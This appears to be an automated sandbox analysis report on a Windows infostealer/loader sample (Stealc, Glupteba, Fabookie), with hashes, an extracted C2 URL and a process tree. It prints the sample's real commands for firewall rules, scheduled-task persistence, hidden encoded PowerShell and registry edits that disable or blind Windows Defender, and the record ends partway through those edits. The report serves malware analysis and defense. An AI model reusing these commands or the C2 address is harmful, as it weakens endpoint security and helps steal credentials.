Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-01-2024 23:09

General

  • Target

    2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe

  • Size

    678KB

  • MD5

    6c81e39fd156891a6e8bbf3d8355e54b

  • SHA1

    3dba98dfcb96bed3f63e8d7524458127d1f8e877

  • SHA256

    2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf

  • SHA512

    664bc397ce092bc555e4a0139607bf66993e5537d13e09c2f604bbbda4be081f85e2e0b4664e8525ecdb45509082d06ff2105808b6e3707930623718d0b3c51c

  • SSDEEP

    12288:cjY/CBAkfIulEPWZmmdtpTkUtBYDxnnz5/ikp3tW9zgOX4sRqG1sqAQO1:F/C6kXNlS5KkqBnqGqqAQO1

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Signatures

  • Detect Fabookie payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 18 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe
    "C:\Users\Admin\AppData\Local\Temp\2b3fbb77e5ed29f7ffbcb9a73cc1e467aed6447fcaf28a47d50f78c81fa17eaf.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4956
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe
        "C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"
        3⤵
        • Executes dropped EXE
        PID:1588
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1700
        • C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe
          "C:\Users\Admin\Pictures\EnYtZjFCPp0j2UWH9hAYujy0.exe"
          4⤵
          • Executes dropped EXE
          PID:5412
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4000
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:5140
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:5228
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4484
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5904
        • C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe
          "C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"
          3⤵
          • Executes dropped EXE
          PID:4328
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
              PID:1348
            • C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe
              "C:\Users\Admin\Pictures\EnX1aDs9Qrx52GFxCqLBYTqv.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:5388
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2428
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                5⤵
                  PID:5404
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    PID:5152
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                    PID:3768
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5724
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    5⤵
                    • Executes dropped EXE
                    PID:2008
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      6⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5976
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  4⤵
                    PID:4940
                • C:\Users\Admin\Pictures\lZLbbsT4K4VwlkfF9Pt10W9z.exe
                  "C:\Users\Admin\Pictures\lZLbbsT4K4VwlkfF9Pt10W9z.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2912
                • C:\Users\Admin\Pictures\6dkzyHLjiRtcVYQUfmU7QR1S.exe
                  "C:\Users\Admin\Pictures\6dkzyHLjiRtcVYQUfmU7QR1S.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                  3⤵
                  • Executes dropped EXE
                  PID:688
                • C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe
                  "C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --silent --allusers=0
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates connected drives
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:3028
                  • C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe
                    C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2f0,0x300,0x6f999530,0x6f99953c,0x6f999548
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:400
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LBwQxwDDb7Gm8NbplPklj6ZO.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --version
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:4664
                  • C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe
                    "C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3028 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240112230922" --session-guid=807933f5-606a-4aa2-8f3a-a0da28cb802a --server-tracking-blob=Y2I1MTNjNmE3Mjc2NjZiNjkxOTRkMzk5YTgzZTc4MTU1YWIzYWRkMGI3MjI0MmRlNjYxMDFiM2YxYzAzNDcxZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTEwMDk1Ny42NDU0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3YzM0YzhlMS02NmY1LTQxN2MtODJhMC0zYTBmZTE1ZGMzYWQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6805000000000000
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates connected drives
                    • Suspicious use of WriteProcessMemory
                    PID:1200
                    • C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe
                      C:\Users\Admin\Pictures\LBwQxwDDb7Gm8NbplPklj6ZO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x300,0x304,0x2d0,0x308,0x6e8a9530,0x6e8a953c,0x6e8a9548
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:5020
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:432
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe" --version
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3548
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x312614,0x312620,0x31262c
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2296
                • C:\Users\Admin\Pictures\XuWl4dYFqa7cvhkX4rvdFKNi.exe
                  "C:\Users\Admin\Pictures\XuWl4dYFqa7cvhkX4rvdFKNi.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2672
                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:4172
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:180
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        6⤵
                        • Creates scheduled task(s)
                        PID:2884
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        6⤵
                          PID:4776
                    • C:\Users\Admin\AppData\Local\Temp\nsr981B.tmp
                      C:\Users\Admin\AppData\Local\Temp\nsr981B.tmp
                      4⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2972
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsr981B.tmp" & del "C:\ProgramData\*.dll"" & exit
                        5⤵
                          PID:4768
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 5
                            6⤵
                            • Delays execution with timeout.exe
                            PID:4480
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 3420
                          5⤵
                          • Program crash
                          PID:4560
                    • C:\Users\Admin\Pictures\XmUoKB0z5EXP4yDeUpNpxAYi.exe
                      "C:\Users\Admin\Pictures\XmUoKB0z5EXP4yDeUpNpxAYi.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:5200
                      • C:\Users\Admin\AppData\Local\Temp\7zS7B46.tmp\Install.exe
                        .\Install.exe
                        4⤵
                        • Executes dropped EXE
                        PID:1052
                        • C:\Users\Admin\AppData\Local\Temp\7zS7FF9.tmp\Install.exe
                          .\Install.exe /tSUWodidgk "385118" /S
                          5⤵
                          • Checks BIOS information in registry
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Enumerates system info in registry
                          PID:3852
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                            6⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1348
                            • C:\Windows\SysWOW64\cmd.exe
                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                              7⤵
                                PID:1144
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                              6⤵
                                PID:4940
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gOipRYOJp" /SC once /ST 20:59:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                6⤵
                                • Creates scheduled task(s)
                                PID:5864
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gOipRYOJp"
                                6⤵
                                  PID:4952
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gOipRYOJp"
                                  6⤵
                                    PID:4060
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "bLyGxHYCYhmZEhkSec" /SC once /ST 23:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exe\" A6 /GHsite_idoKq 385118 /S" /V1 /F
                                    6⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:5972
                        • C:\Windows\SysWOW64\cmd.exe
                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                          1⤵
                            PID:1520
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                              2⤵
                                PID:3124
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                2⤵
                                  PID:2936
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                1⤵
                                  PID:5440
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                  1⤵
                                    PID:744
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                    1⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5720
                                    • C:\Windows\system32\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:4328
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                    1⤵
                                      PID:5788
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                      1⤵
                                        PID:5184
                                      • C:\Windows\system32\gpscript.exe
                                        gpscript.exe /RefreshSystemParam
                                        1⤵
                                          PID:5860
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2972 -ip 2972
                                          1⤵
                                            PID:428
                                          • C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exe
                                            C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exe A6 /GHsite_idoKq 385118 /S
                                            1⤵
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            PID:5928
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                              2⤵
                                                PID:2720
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:3480
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                      4⤵
                                                        PID:3988
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:3816
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                        3⤵
